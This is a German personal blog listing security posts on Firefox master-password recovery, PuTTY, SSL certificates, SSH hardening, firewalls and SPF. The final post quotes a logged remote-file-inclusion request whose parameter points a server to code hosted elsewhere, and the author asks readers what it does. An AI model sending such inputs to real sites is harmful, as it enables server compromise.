//Notizblog
Sicherheit
Firefox Masterpasswort wiederfinden
288 Tage
Hat man sein Firefox Masterpasswort vergessen gibt es 2 Möglichkeiten:
1. Man resettet es und verliert alle damit verschlüsselten Passworter.
Dazu einfach chrome://pippki/content/resetpassword.xul in die Adressleiste eingeben und bestätigen.
2. Man läd sich FireMaster herunter und nimmt sich 5 Minuten Zeit um mit den Teilen seines Passworts, an die man sich noch erinnert, eine Bruteforce- oder Hybridatacke zu starten.
Gesichert werden die Passwörter in der key3.db im Firefox-Profilordner. Bei meinem Windows 7 mit Firefox 4 unter: C:\Users\.
Ich kann nur sagen, dass Mehode 2 viel zu leicht funktioniert hat 
PuTTY und Pagent Shortcuts
532 Tage
Ich nutze jetzt schon seit einiger Zeit PuTTY für die Verbindung zu meinem vServer. Da ich gerade auf die komfortable und sicherere PublicKey Authentication umgestiegen bin, hier der passende Tip, wie man für Putty und Puttyagent die Logindaten bereits per Verknüpfung übergibt.
Wenn man in PuTTY bereits ein Profil gespeichert hat, kann man dieses später mit einem an die Verknüpfung zur putty.exe angehängtes -load wieder aufrufen. Damit auch der Loginname übergeben wird, kann man noch -l angeben. (Natürlich ohne die <> Klammern).
Bsp.: "C:\Program Files (x86)\Putty\putty.exe" -load
Weitere Optionen findet man in der Dokumentation, ab Punkt 3.8. “The PuTTY commandline”. Es ist sogar möglich, ein Passwort zu übergeben, worauf ich sicherheitshalber verzichte.
Wer sich häufig verbindet, dem ist eher zu empfehlen, den Puttyagent zu nutzen. Hier reicht es, wenn der PrivateKey einmal freigeschaltet wird. Bis der Agent wieder geschlossen wird, merkt sich pagent.exe die Passphrase und es reicht, wenn in der nächsten SSH-Session nur der Username angegeben wird.
Für Pagent sieht die Verknüpfung mit Pfad zum Key so aus:
"C:\Program Files (x86)\Putty\pageant.exe"
Gratis SSL-Zertifikat erstellen
553 Tage
Wer sich schon einmal ein self-signed Zertifikat erstellt hat wird wissen, dass alle Browser vor dem Aufbau einer Verbindung eine nervige, bzw. abschreckende Warnung ausgeben.
Wer ein SSL-Zertifikat von einer anerkannten Autorität haben wollte, musste dafür bisher, auch wenn es nur um ein Hobbyprojekt ging, tief in die Tasche greifen.
Einen guten Ansatz hat die spendenfinanzierte Gemeinschaft CAcert.org verfolgt, konnte es aber bisher nicht in die Stammzertifikatslisten schaffen.
Jetzt bietet der kommerzielle Anbieter StarCom mit StarSSL kostenlose SSL-Zertifikate an, die bis auf Opera allen wichtigen Browsern bekannt sind.
Die Anmeldung ist etwas gewöhnungsbedürftig. Zuerst einmal bekommt man kein Passwort, sondern ein Client-Zertifikat, mit dem man sich in seinem Account anmeldet (und was man gut aufheben sollte). Zum Anderen fand ich die Menüführung kompliziert.
Vor allem sollte man sich bewusst sein, dass die erstellten Zertifikate nach einem Jahr erneuert werden müssen und es keine kostenlosen Wildcard-Zertifikate gibt.
Während der Installation wird zwar angeboten, ein Schlüsselpaar generieren zu lassen, es ist aber empfehlenswert seinen Privaten Schlüssel selbst zu erstellen.
Eine sehr gut bebilderte Anleitung habe ich bei Lernschmiede.de – kostenfreie Zertifikate gefunden.
Bei heise.de gibt es ebenfalls eine kurze Anleitung.
Auch das StarCom Wiki bietet eine ausführliche Installationshilfe.
SSH absichern
559 Tage
Nach der Neuinstallation eines Servers mit Internetanbindung sollte man zuerst einmal seine SSH-Verbindung absichern.
Dazu sind folgende Schritte sinnvoll und können an der /etc/ssh/sshd_config durchgeführt werden:
- Default SSH Port ändern
- Root Login verbieten
- Nur einem User den Login erlauben
- Diesem User alle Rechte, bis auf su entziehen
- Fail2ban oder DenyHosts installieren
- Evtl. SSH Key Auth statt Passwort nutzen
- Evtl. SSH per IPTables nur für DynDNS IP erlauben
Die meisten der oben aufgeführten Schritte werden auf wiki.debianforum.de erklärt.
Leben ohne Google?
793 Tage
Es ist schon irre. Kaum ein Tag vergeht ohne News über Google. Entweder ein neuer Dienst wird angekündigt oder ein Rechtsstreit angefangen.
Klar, große Firmen haben es bei all den Patenten und Gesetzten selbst mit einer großen Rechtsabteilung nicht leicht.
Das tolle an Google: Alles ist umsonst. Wirklich?
Googles Haupteinnahmequelle, die Werbung, ist ja bekannt. Also nicht ganz umsonst.
Viel höher ist für den Nutzer aber der Preis für den Verlust seiner Privatsphäre. Wer garantiert mir, dass Google mein Nutzungsprofil irgendwann wieder löscht und nicht gar mit anderen Google-Diensten abgleicht.
Sollte dies eines Tages geschehen, wären wir für Google wirklich gläserne Nutzer.
Hier einmal eine Liste was im Worst Case alles über uns bekannt ist: (weiterlesen…)
Firewallregeln für ausgehende Verbindungen in Windows 7
830 Tage
Die Firewall in Windows XP war mehr oder weniger uninteressant, weil sie lediglich eingehende Verbindungen kontrollieren konnte. Hatte man sich einen Trojaner oder Keylogger eingefangen, konnte dieser ohne Nachfrage Dateien ins Netz versenden. Windows 7 hat jetzt endlich eine Firewall, die auch ausgehenden Traffic kontrolliert. Leider ist das zugunsten von weniger Userinteraktion keine Standardeinstellung. Wer Ausgehenden Traffic kontrollieren möchte Klickt Start -> Systemsteuerung -> System und Sicherheit -> Windows-Firewall -> Erweiterte Einstellungen im Mittleren Fenster ganz unten dann auf Windows-Firewalleigenschaften. Dort kann man für das jeweilige Profil bei Status die Ausgehende Verbindungen auf “Blockieren” setzen. Das heißt leider nicht, wie ich durch einen Kommentar aufgeklärt wurde, dass eine Nachfrage erscheint, sondern, dass man nun nach der Whitelist Methode, wie schon in Vista, allen benötigten Programmen in den Firewalloptionen einzeln Zugriff gewähren muss. Die Default Einstellungen findet man im Dokument “HomeGroup and Firewall Interaction” auf der Microsoft Seite. Die Nachfrage erscheint tatsächlich nur bei eingehenden Verbindungen. Warum dieses Feature für ausgehende Verbindungen nicht verfügbar ist bleibt mir ein Rätsel… Einzige Lösung scheint mir momentan die Freeware Window 7 Firewall Control von Sphinx zu sein, die als 3rd Party Applikation aber wieder ein Risiko darstellt.
Hosteurope SSL CA Zertifikat ins Nokia e71 importieren
832 Tage
Ich hatte mit meinem Nokia e71 das Problem, dass es die Self-Signed Zertifikate von Hosteurope resp. Comodo nicht anerkennen wollte. Daher blieb nur die Möglichkeit die Zertifikate manuell runterzuladen, um nicht nur per “Nur diesmal akzeptieren” an seine Mails zu kommen.
Hosteurope bietet die Zertifikate in seiner FAQ zum Download an:
http://faq.hosteurope.de/index.php?cpid=14507
Ansonten hilft auch ein Speichern unter und Öffnen des Zertifikats und unter Details -> in Datei kopieren wählen und im DER Format mit der Endung .crt exportieren und bei redelijkheid.com hochladen, und mit dem Handy den angegebenen Link ansteuern. Natürlich kann man die Datei alternativ auf seinen eigenen Server stellen und in die .htaccess folgenden Mimetyp eintragen: AddType application/x-x509-ca
Vorratsdatenspeicherung auf dem eigenen Server
903 Tage
Habe gerade etwas interessantes im Host Europe FAQ entdeckt.
Hier die entscheidende Stelle:
Wenn Sie bei uns Produkte betreiben, mit denen Sie selbst derartige Dienste anbieten, z.B. dedizierte oder virtuelle Serverprodukte, führen wir selbst keine Speicherung durch. Diese liegt dann in Ihrem Aufgabenbereich.
Wer einen privaten E-Mail Server betreibt, ist von der Pflicht zur Vorratsdatenspeicherung ausgenommen.
Wenn man bedenkt, dass man teilweise für 1,69€ einen für E-Mail ausreichenden V-Server bekommt…
Terroristen werden also nicht auf Kurierdienste umsteigen müssen.
Zum Betrieb eines Servers und den Spamproblemen, die man sich damit einhandelt, erfährt man einiges in CCC ausgabe 104.
Ob Google große Investitionen tätigen musste, um die Verkehrsdaten für so lange Zeit zu speichern?
E-Mail Absender zertifizieren per SPF
909 Tage
Ich hatte gerade Probleme, Mails von meiner Domain an Yahoo zu senden. Die Mails, die von meinem PC und nicht über den Webmailer liefen, landeten alle mit starker Verzögerung im Spamfilter. Das heißt zwar nichts, da selbst die Mails des yahooeigenen Supports dort hineingefiltert wurden, ohne dass ich Filterregeln eingerichtet, o.ä. getan habe. Dennoch wollte ich sichergehen, dass meine Mails immer ankommen.
Wer bei einem der “Großen”, also GMX, Google etc. ist, wird weniger Probleme mit Mailfiltern haben, da sich große Mailprovider untereinander zertifizieren. Ich hatte solche Möglichkeiten, wie Remote DNS Eintrag o.ä. aufgrund meiner dynamischen IP leider nicht. Was aber machbar ist, ist das Einrichten eines SPF Records (Sender Policy Framework). Dieser wird beim Nameserver meist als txt gehostet und erlaubt allen Mailprovidern die Rückfrage, ob es den Absender wirklich gibt.
SpamAssassin bei Host Europe wertet einen solchen Eintrag mit -2.5 im Spamcount. Bei +5 wird eine Mail dort gefiltert. Da ich bei anderen Mailern ein ähnliches Vorgehen vermute lohnt ein solcher Eintrag allemal. (weiterlesen…)
What the heck?
910 Tage
Ein fleißiger Hacker mit folgender Hausnummer 116.122.158.207 hat heute diese Adresse aufrufen wollen:
http://www.knevels.org///admin.php?includes&config[path]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt??
Falls jemand den Hack kennt:was bewirkt er, wenn er funktioniert und bei welcher WordPress version? Sieht für mich aus wie das Einfügen eines neuen Users.
Folgenden Inhalt hatte die Textdatei:
zfxid.txt
RSS-Feed